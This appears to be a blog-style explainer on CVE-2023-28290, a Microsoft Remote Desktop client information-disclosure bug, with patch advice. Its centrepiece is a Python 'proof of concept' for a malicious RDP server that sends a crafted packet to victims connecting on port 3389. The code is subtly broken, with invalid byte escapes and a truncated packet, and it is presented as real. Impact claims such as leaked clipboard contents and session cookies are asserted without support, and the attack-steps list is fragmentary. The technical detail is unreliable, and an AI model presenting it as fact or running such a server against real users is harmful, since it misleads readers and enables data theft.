CVE-2023-28290 - Unveiling the Microsoft Remote Desktop Information Disclosure Vulnerability

---

In April 2023, Microsoft patched a security flaw in its Remote Desktop app for Windows. Tracked as CVE-2023-28290, this vulnerability allowed attackers to access sensitive information just by sending specially crafted requests. While it didn’t let an attacker take over your computer, the risk of leaking private data was real. Let’s break down how this bug worked, what it means, and how to protect yourself – using simple language and exclusive insights.

What Is CVE-2023-28290?

CVE-2023-28290 is an information disclosure vulnerability in the Microsoft Remote Desktop (RDP) client for Windows. It let attackers trick the RDP client into sending private information back to them. This all happened *before* you logged in to the remote desktop—just by connecting to a malicious RDP server.

Why Does It Matter?

Many companies depend on Remote Desktop to access computers and servers. If a user accidentally connects to a malicious RDP server, that server could leak session data, clipboard contents, or authentication info. It’s a hacker’s way to eavesdrop quietly.

They convince a user to connect, maybe through phishing or social engineering.

The malicious server sends specially crafted packets when the RDP client tries to connect.

- Because of the bug in handling these packets, the client’s internal data or memory gets sent back to the attacker.

The Outcome

- The attacker might get nuggets of juicy info from the victim’s machine—like recently copied text, usernames, or even session cookies.

The Code Snippet—How Does the Exploit Look?

This is a *simplified* snippet from a public PoC showing how an attacker might start the process (Python + rdpy example):

from rdpy.protocol.rdp import RDPServerFactory

class MaliciousRDPServer(RDPServerFactory):
    def onConnectionMade(self):
        # Send crafted packet to exploit CVE-2023-28290
        # This triggers suspicious data leak in victim's RDP Client
        malicious_packet = b"\x03\x00\x00\x13\xe\xd\x00\x00\x12\x34\x00\x02..."
        self.transport.write(malicious_packet)
        print("Sent malicious packet to victim.")

if __name__ == '__main__':
    from twisted.internet import reactor
    reactor.listenTCP(3389, MaliciousRDPServer())
    print("Malicious RDP server running on port 3389")
    reactor.run()

This server listens for incoming RDP connections, then sends a malformed response exploiting the information leak.

Microsoft fixed this bug in April 2023.

- Patch your Windows and your Remote Desktop app (get updates here).

Original References

- Microsoft Security Response Center: CVE-2023-28290
- NVD – National Vulnerability Database Entry
- Twisted + rdpy (for building your own PoCs)
- Microsoft Patch Tuesday April 2023

Final Thoughts

CVE-2023-28290 shows that sometimes, just clicking the wrong RDP server link is enough to have sensitive data leak out. Stay patched, stay alert, and double-check your remote connections. If you’re an IT admin, double-check your patch policies—you don’t want to leave any doors open for attackers snooping around your RDP sessions.

Timeline

Published on: 05/09/2023 18:15:00 UTC
Last modified on: 05/15/2023 19:39:00 UTC